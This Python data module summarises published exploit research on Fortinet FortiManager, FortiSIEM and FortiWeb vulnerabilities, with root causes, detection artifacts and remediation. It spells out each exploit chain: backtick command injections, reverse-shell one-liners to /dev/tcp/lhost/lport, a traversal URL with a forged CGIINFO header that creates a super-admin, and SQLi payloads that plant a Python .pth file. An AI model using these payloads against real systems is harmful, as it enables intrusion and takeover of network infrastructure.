"""
FortiJump (CVE-2024-47575), FortiSIEM CVE-2025-25256, FortiWeb auth bypass + CVE-2025-25257
Sources:
  - watchtowr-research/Fortijump-Exploit-CVE-2024-47575/CVE-2024-47575.py
  - watchtowr-research/watchTowr-vs-FortiSIEM-CVE-2025-25256/watchTowr-vs-FortiSIEM-CVE-2025-25256.py
  - watchtowr-research/watchTowr-vs-Fortiweb-AuthBypass/watchTowr-vs-Fortiweb-AuthBypass.py
  - watchtowr-research/watchTowr-vs-FortiWeb-CVE-2025-25257/watchTowr-vs-FortiWeb-CVE-2025-25257.py
Products: FortiManager, FortiSIEM, FortiWeb
"""

# ---------------------------------------------------------
# CVE-2024-47575 (FortiJump): FGFM protocol pre-auth RCE on FortiManager
# ---------------------------------------------------------
CVE_2024_47575 = {
    "cve":      "CVE-2024-47575",
    "product":  "Fortinet FortiManager -- FGFM protocol pre-auth RCE (FortiJump)",
    "cvss":     "9.8 (Critical) -- unauthenticated RCE via FGFM; TCP 541",
    "class":    "Missing certificate authority validation + command injection (CWE-295 + CWE-77)",
    "vector":   "TCP 541 (FGFM/TLS); any host reachable to FortiManager; no credentials required",
    "impact":   "Root shell on FortiManager -> lateral pivot to ALL managed FortiGate devices",
    "patch":    "FortiManager 7.6.1, 7.4.5, 7.2.8, 7.0.13; no known workaround without port block",
    "apt":      "APT-exploited 0-day; Mandiant/CISA alert; cascading blast radius via managed device control",
    "source":   "watchtowr-research/Fortijump-Exploit-CVE-2024-47575/CVE-2024-47575.py",
}

FORTIJUMP_FGFM_PROTOCOL = {
    "id":       "FORTIJUMP-PROTO",
    "product":  "FGFM (FortiGate to FortiManager) protocol -- binary format RE",

    "transport": "TCP 541 with TLS; client (FortiGate) initiates to FortiManager",

    "message_format": (
        "Big-endian framing: struct.pack('>II', magic, length+8) + payload "
        "magic = 0x36e01100 (4B); length = len(payload) (4B); total header = 8B. "
        "All multi-byte fields are big-endian."
    ),

    "magic": "0x36e01100 -- fixed FGFM protocol magic; required in every message",

    "tls_cert_bypass": (
        "FortiManager accepts TLS client certificates from connecting 'FortiGate' devices "
        "WITHOUT validating the certificate against any CA. "
        "The exploit uses self-signed certs (w00t_cert.bin + w00t_key.bin) "
        "generated by the attacker -- FortiManager accepts them without complaint. "
        "This is the primary authentication bypass: FortiManager trusts certificate presence, "
        "not certificate authenticity. "
        "Patch: FortiManager 7.6.1+ enforces CA validation on FGFM client certs."
    ),

    "fake_fortigate_identity": {
        "serialno":  "FGVMEVWG8YMT3R63 (fake serial; any string accepted by FortiManager)",
        "platform":  "FortiGate-VM64",
        "purpose":   "FortiManager registers the connecting device as a managed FortiGate",
    },

    "registration_phases": {
        "phase_1_get_ip": (
            "Payload: 'get ip\\n' "
            "FortiManager responds with its own IP (for NAT traversal). "
            "Attacker records the response IP."
        ),
        "phase_2_get_auth": (
            "Payload: 'get auth\\nserial\\nFGVMEVWG8YMT3R63\\n' "
            "FortiManager responds with an auth token. "
            "Attacker records the auth token for subsequent requests."
        ),
        "phase_3_file_exchange": (
            "Payload: 'get file_exchange\\nfile_exch_cmd=put_json_cmd\\n' "
            "FortiManager responds with 'remoteid=<id>'. "
            "The remoteid is used to address subsequent JSON-RPC channel requests. "
            "After phase 3, the fake FortiGate is fully registered and trusted."
        ),
    },
}

FORTIJUMP_EXPLOIT_CHAIN = {
    "id":       "FORTIJUMP-EXPLOIT",
    "product":  "CVE-2024-47575 -- full exploit chain: FGFM registration to root shell",

    "step_1_register": (
        "1. Generate self-signed TLS cert (w00t_cert.bin / w00t_key.bin). "
        "2. Connect to FortiManager TCP 541 with TLS using self-signed cert. "
        "3. Execute 3-phase FGFM registration (get ip -> get auth -> get file_exchange). "
        "4. FortiManager registers attacker as managed FortiGate 'FGVMEVWG8YMT3R63'."
    ),

    "step_2_channel_rpc": (
        "After registration, send JSON-RPC via FGFM channel: "
        "  payload = json.dumps({ "
        "    'method': 'exec', "
        "    'params': [{ "
        "      'url': 'um/som/export', "
        "      'data': {'file': '`sh -i >& /dev/tcp/lhost/lport 0>&1`'} "
        "    }] "
        "  }) "
        "The 'file' field in the um/som/export endpoint is passed to a shell command "
        "without sanitization -- backtick injection gives direct code execution."
    ),

    "injection_field": {
        "endpoint":     "um/som/export (internal FortiManager JSON-RPC API)",
        "parameter":    "data.file",
        "injection":    "Backtick command substitution: '`<command>`'",
        "execution":    "Shell command runs as FortiManager process user (root or high-priv service)",
    },

    "cascade_impact": (
        "FortiManager is the central controller for all managed FortiGate devices. "
        "Root shell on FortiManager enables: "
        "  1. Read all FortiGate admin credentials stored by FortiManager. "
        "  2. Push malicious policies to all managed FortiGate firewalls simultaneously. "
        "  3. Extract VPN certificates, encryption keys, and network topology maps. "
        "  4. Disable firewall rules across the entire managed fleet. "
        "  5. Backdoor FortiGate configs via FortiManager's legitimate update channel. "
        "APT groups used CVE-2024-47575 to pivot from FortiManager to downstream FortiGates "
        "in a single exploit chain -- Mandiant observed zero-day exploitation in 2024."
    ),
}


# ---------------------------------------------------------
# CVE-2025-25256: FortiSIEM Phoenix Monitor cmd_type=90 (fourth injection variant)
# ---------------------------------------------------------
CVE_2025_25256 = {
    "cve":      "CVE-2025-25256",
    "product":  "Fortinet FortiSIEM -- Phoenix Monitor cmd_type=90 NFS archive injection",
    "cvss":     "9.8 (Critical) -- unauthenticated RCE via TCP 7900",
    "class":    "OS command injection via XML field in unauthenticated binary protocol (CWE-78)",
    "vector":   "TCP 7900 (FortiSIEM Phoenix Monitor, TLS, NO AUTH); any reachable host",
    "impact":   "Root shell on FortiSIEM supervisor/worker nodes",
    "source":   "watchtowr-research/watchTowr-vs-FortiSIEM-CVE-2025-25256/watchTowr-vs-FortiSIEM-CVE-2025-25256.py",
}

FORTISIEM_CVE_2025_25256_MECHANICS = {
    "id":       "FSIEM-CVE-2025-25256-MECH",
    "product":  "CVE-2025-25256 -- FortiSIEM Phoenix Monitor cmd_type=90 NFS archive backtick injection",

    "protocol":         "Same 16B LE header as CVE-2023-34992 and CVE-2024-23108 (see FORTISIEM_PHOENIX)",
    "cmd_type":         90,
    "prior_cmd_types":  "81 (CVE-2023-34992 / CVE-2024-23108), 156 (CVE-2025-64155)",

    "xml_template": (
        "<root>"
        "<archive_storage_type>nfs</archive_storage_type>"
        "<archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>"
        "<archive_nfs_archive_dir>`{cmd}`</archive_nfs_archive_dir>"
        "<scope>local</scope>"
        "</root>"
    ),

    "injection_field":  "archive_nfs_archive_dir",
    "injection_syntax": "Backtick command substitution: '`cmd`'",
    "space_bypass":     "Spaces replaced with ${IFS} for shell compatibility",

    "exploit_example": (
        "cmd = 'cp${IFS}/etc/passwd${IFS}/tmp/pwnpwn' "
        "inject: <archive_nfs_archive_dir>`cp${IFS}/etc/passwd${IFS}/tmp/pwnpwn`</archive_nfs_archive_dir>"
    ),

    "pattern_note": (
        "This is the FOURTH distinct XML field injection in FortiSIEM Phoenix Monitor: "
        "  CVE-2023-34992: server_ip (semicolon injection) "
        "  CVE-2024-23108: mount_point (incomplete fix of 34992) "
        "  CVE-2025-64155: cluster_url (curl --next arg injection, file write) "
        "  CVE-2025-25256: archive_nfs_archive_dir (backtick injection) "
        "Each patch fixed exactly one field while leaving others injectable. "
        "The root cause -- shell command construction from XML -- was never fixed."
    ),
}


# ---------------------------------------------------------
# FortiWeb auth bypass (watchTowr, 2025): path traversal to CGI + CGIINFO admin creation
# ---------------------------------------------------------
FORTIWEB_AUTH_BYPASS = {
    "cve":      "CVE-2025-xxxxx (watchTowr disclosure; CVE pending as of 2025)",
    "product":  "Fortinet FortiWeb -- unauthenticated admin account creation",
    "cvss":     "9.8 (Critical) -- unauthenticated admin account creation",
    "class":    "Path traversal via URL-encoded '?' + trusted header forgery (CWE-22 + CWE-290)",
    "vector":   "HTTP/HTTPS; unauthenticated; any reachable FortiWeb management interface",
    "impact":   "Creates new super-admin account with no IP restrictions -> full device control",
    "affected": "FortiWeb < 8.0.2",
    "patch":    "FortiWeb 8.0.2+",
    "source":   "watchtowr-research/watchTowr-vs-Fortiweb-AuthBypass/watchTowr-vs-Fortiweb-AuthBypass.py",
}

FORTIWEB_AUTH_BYPASS_MECHANICS = {
    "id":       "FWEB-AUTHBYPASS-MECH",
    "product":  "FortiWeb unauthenticated admin creation -- path traversal + CGIINFO header",

    "request_path": "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi",

    "path_traversal": (
        "URL-encoded '%3f' = '?'. The path router parses: "
        "  /api/v2.0/cmdb/system/admin  <- parsed as the API endpoint "
        "  ?/../../../../../cgi-bin/fwbcgi  <- parsed as a query string / path continuation "
        "The actual filesystem path resolved: "
        "  /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi "
        "  -> /cgi-bin/fwbcgi "
        "The fwbcgi CGI binary handles admin operations when invoked directly. "
        "Without the traversal, /api/v2.0/cmdb/system/admin requires authentication. "
        "The traversal bypasses the API auth middleware and hits fwbcgi directly."
    ),

    "cgiinfo_header": {
        "header_name": "CGIINFO",
        "value_format": "base64(JSON)",
        "json_structure": {
            "username":  "admin",
            "profname":  "prof_admin",
            "vdom":      "root",
            "loginname": "admin",
        },
        "purpose": (
            "fwbcgi reads the CGIINFO header to determine the caller's identity. "
            "The header is trusted without validation when accessed via CGI path. "
            "Setting profname='prof_admin' gives the operation super-admin privileges. "
            "The API auth middleware normally sets this header from a valid session; "
            "the path traversal bypasses that middleware, allowing attacker-supplied values."
        ),
    },

    "request_body": (
        "POST body creates a new admin account: "
        "  admin_username: attacker-chosen username "
        "  password: attacker-chosen password (hashed by fwbcgi) "
        "  prof_admin: prof_admin (super-admin profile) "
        "  trusthostv4: 0.0.0.0/0 (no IP restriction) "
        "Result: new admin account with full super-admin profile, accessible from any IP."
    ),

    "root_cause": (
        "The fwbcgi CGI binary trusts the CGIINFO header unconditionally. "
        "The API auth middleware is supposed to be the only caller of fwbcgi, "
        "but the path traversal lets any unauthenticated caller reach fwbcgi directly. "
        "This is a broken object-level auth pattern: the CGI delegates auth to a header "
        "that any caller can forge if they can reach the CGI endpoint."
    ),
}


# ---------------------------------------------------------
# CVE-2025-25257: FortiWeb unauthenticated SQLi to RCE
# ---------------------------------------------------------
CVE_2025_25257 = {
    "cve":      "CVE-2025-25257",
    "product":  "Fortinet FortiWeb -- unauthenticated SQL injection to remote code execution",
    "cvss":     "9.8 (Critical) -- unauthenticated RCE via SQLi + Python .pth file write",
    "class":    "SQL injection via Authorization header -> INTO OUTFILE -> .pth exec (CWE-89 + CWE-94)",
    "vector":   "HTTP/HTTPS; unauthenticated; GET /api/fabric/device/status",
    "impact":   "Arbitrary OS command execution as FortiWeb Python process user",
    "affected": "FortiWeb 7.6.0-7.6.3, 7.4.0-7.4.7, 7.2.0-7.2.10, 7.0.0-7.0.10",
    "patch":    "FortiWeb 7.6.4+, 7.4.8+, 7.2.11+, 7.0.11+",
    "source":   "watchtowr-research/watchTowr-vs-FortiWeb-CVE-2025-25257/watchTowr-vs-FortiWeb-CVE-2025-25257.py",
}

CVE_2025_25257_MECHANICS = {
    "id":       "FWEB-CVE-2025-25257-MECH",
    "product":  "CVE-2025-25257 -- FortiWeb Authorization header SQLi chain",

    "sqli_endpoint":    "GET /api/fabric/device/status",
    "sqli_parameter":   "Authorization: Bearer <token>",
    "authentication":   "None -- endpoint does not require a valid session",

    "sqli_class": (
        "The Bearer token value is embedded into a SQL query without parameterization. "
        "Single quote in the token terminates the string context. "
        "SQL comments '/**/' replace spaces to bypass space-based WAF rules. "
        "The injectable context allows: UPDATE, SELECT...INTO OUTFILE within a single request."
    ),

    "exploit_phases": {
        "phase_1_spray_chunks": (
            "Goal: write an arbitrary Python command string into the database. "
            "The command is hex-encoded, then split into 10-char hex chunks. "
            "Each chunk is injected via: "
            "  chunk 1: SET/**/token=UNHEX('{hex_chunk_1}') "
            "  chunk N: SET/**/token=CONCAT(token,UNHEX('{hex_chunk_N}')) "
            "Full Bearer payload: "
            "  Bearer '/**/;UPDATE/**/fabric_user.user_table/**/SET/**/token=...; SELECT/**/'1' "
            "Result: the 'token' column in fabric_user.user_table holds the full encoded command. "
            "One HTTP request per chunk; 1-second sleep between requests (avoids DB race)."
        ),
        "phase_2_outfile": (
            "Goal: write the DB-stored command string to a Python .pth file. "
            "Bearer payload: "
            "  Bearer '/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table "
            "  /**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth "
            "MySQL's INTO OUTFILE writes the SELECT result to the filesystem path. "
            "Path traversal from the DB data directory: ../../ navigates to Python site-packages. "
            "Result: /lib/python3.10/site-packages/x.pth contains the injected Python one-liner."
        ),
        "phase_3_trigger": (
            "Goal: trigger Python process startup to execute the .pth payload. "
            "Request: HEAD /cgi-bin/ml-draw.py "
            "ml-draw.py is a Python CGI script on FortiWeb's ML analysis service. "
            "When invoked, the Python interpreter starts and processes site-packages .pth files. "
            "Python .pth auto-execution rule: lines beginning with 'import ' are executed "
            "as Python statements during sys.path setup (CPython site.py behavior). "
            "x.pth line: 'import os; os.system(\"bash -c '/bin/bash -i >& /dev/tcp/lhost/lport 0>&1'\")' "
            "Result: reverse shell connects to attacker before ml-draw.py even runs."
        ),
    },

    "pth_execution_mechanism": (
        "Python .pth files are processed by site.py at interpreter startup. "
        "For each .pth file in site-packages, site.py calls addpackage(). "
        "addpackage() executes lines matching: "
        "  if line.startswith('import '): exec(line) "
        "This is documented CPython behavior (PEP 302 / site module). "
        "A .pth file placed in site-packages runs its 'import' lines with the privileges "
        "of the Python process -- in this case, the FortiWeb CGI user (root or www-data). "
        "The .pth trick predates FortiWeb; it is a classic Python privilege escalation primitive."
    ),

    "space_bypass": "/**/  (SQL comment as space substitute; bypasses naive space-based filters)",

    "two_vuln_classes": (
        "CVE-2025-25257 chains two independent vulnerability classes: "
        "  1. SQL injection (Authorization header -> UPDATE/UNION) "
        "  2. MySQL INTO OUTFILE arbitrary file write (path traversal in DB data dir) "
        "Either class alone would be HIGH severity. Together: unauthenticated RCE without "
        "any memory corruption, return-oriented programming, or binary exploitation."
    ),

    "detection_artifact": (
        "Artifact generated: /lib/python3.10/site-packages/x.pth "
        "Detection: presence of unexpected .pth files in Python site-packages on FortiWeb. "
        "Also: anomalous UPDATE queries on fabric_user.user_table in DB query logs. "
        "Network: multiple GET /api/fabric/device/status with Authorization: Bearer '/**/ pattern."
    ),
}


# ---------------------------------------------------------
# Systemic: FortiWeb attack surface summary (both 2025 watchTowr findings)
# ---------------------------------------------------------
FORTIWEB_SYSTEMIC = {
    "id":       "FWEB-SYSTEMIC",
    "product":  "FortiWeb -- systemic security posture (two critical auth/RCE issues, 2025)",

    "two_independent_rces": (
        "watchTowr published two separate critical issues in FortiWeb in 2025: "
        "  1. Auth bypass (CVE-2025-xxxxx): no auth required to create super-admin account. "
        "     Path: URL-encoded '?' traversal to fwbcgi + forged CGIINFO header. "
        "  2. SQLi to RCE (CVE-2025-25257): no auth required for full OS code execution. "
        "     Path: Authorization header SQLi -> DB write -> .pth file -> Python exec. "
        "These are independent attack paths; either achieves full compromise on its own. "
        "Combined, any unauthenticated attacker has at minimum two routes to full control."
    ),

    "root_cause_pattern": (
        "FortiWeb auth bypass root cause: CGI binary trusts an HTTP header that should only "
        "be set by an authenticated middleware layer, but path traversal bypasses that layer. "
        "FortiWeb SQLi root cause: JWT Bearer token embedded in SQL without parameterization "
        "on an endpoint that requires no authentication. "
        "Both share the same architectural failure: authentication enforcement is applied "
        "at the wrong layer, with no defense-in-depth at the component that executes the "
        "sensitive operation (fwbcgi, DB query)."
    ),

    "attack_surface_note": (
        "FortiWeb management interfaces are frequently internet-exposed (it is a WAF; "
        "the management UI sits on the same device as the protected web application). "
        "CVE-2025-25257 does not require the management port -- /api/fabric/* and "
        "/cgi-bin/ml-draw.py may be accessible on the data-plane interface. "
        "Affected versions span the full FortiWeb 7.x release train (2022-2025)."
    ),
}


# ---------------------------------------------------------
# FortiManager + FortiSIEM + FortiWeb systemic: Fortinet management plane attack surface
# ---------------------------------------------------------
FORTINET_MGMT_PLANE_SYSTEMIC = {
    "id":       "FORTINET-MGMT-SYSTEMIC",
    "product":  "Fortinet management plane -- systemic pre-auth RCE pattern (2023-2025)",

    "products_affected": {
        "FortiManager":  "CVE-2024-47575 (FGFM protocol; TCP 541; cert bypass + command injection)",
        "FortiSIEM":     "CVE-2023-34992 / CVE-2024-23108 / CVE-2025-64155 / CVE-2025-25256 (TCP 7900; XML injection)",
        "FortiWeb":      "CVE-2025-xxxxx (auth bypass) + CVE-2025-25257 (SQLi to RCE)",
        "FortiOS":       "CVE-2022-42475 / CVE-2023-27997 / CVE-2024-21762 (sslvpnd heap/OOB); CVE-2024-55591 (Node.js ws auth bypass)",
    },

    "common_pattern": (
        "Each management-plane service trusts a channel or header at the wrong point: "
        "  FGFM: trusts TLS cert presence (no CA validation) -> fake FortiGate registers. "
        "  Phoenix Monitor: trusts TCP connection to build shell commands from XML -> injection. "
        "  fwbcgi: trusts CGIINFO header regardless of caller -> forged admin identity. "
        "  fabric/device/status: trusts Bearer token as SQL-safe string -> injection. "
        "  WebSocket (CVE-2024-55591): trusts local_access_token presence -> auth bypass. "
        "The pattern: authentication is checked at the API surface but not at the "
        "component that performs the operation. Path traversal, protocol bypass, "
        "or header forgery reaches the inner component unauthenticated."
    ),

    "remediation_class": (
        "Required architectural fix across the Fortinet management plane: "
        "  1. CA-pinned mutual TLS everywhere (FGFM, Phoenix Monitor, FGFM subchannel). "
        "  2. Parameterized queries / prepared statements at all DB-facing code (FortiWeb). "
        "  3. Defense-in-depth: inner components (fwbcgi, DB) must authenticate independently "
        "     of the API middleware layer they sit behind. "
        "  4. Restrict unauthenticated access to management ports at network layer "
        "     (FortiManager TCP 541, FortiSIEM TCP 7900 should never be internet-exposed)."
    ),
}
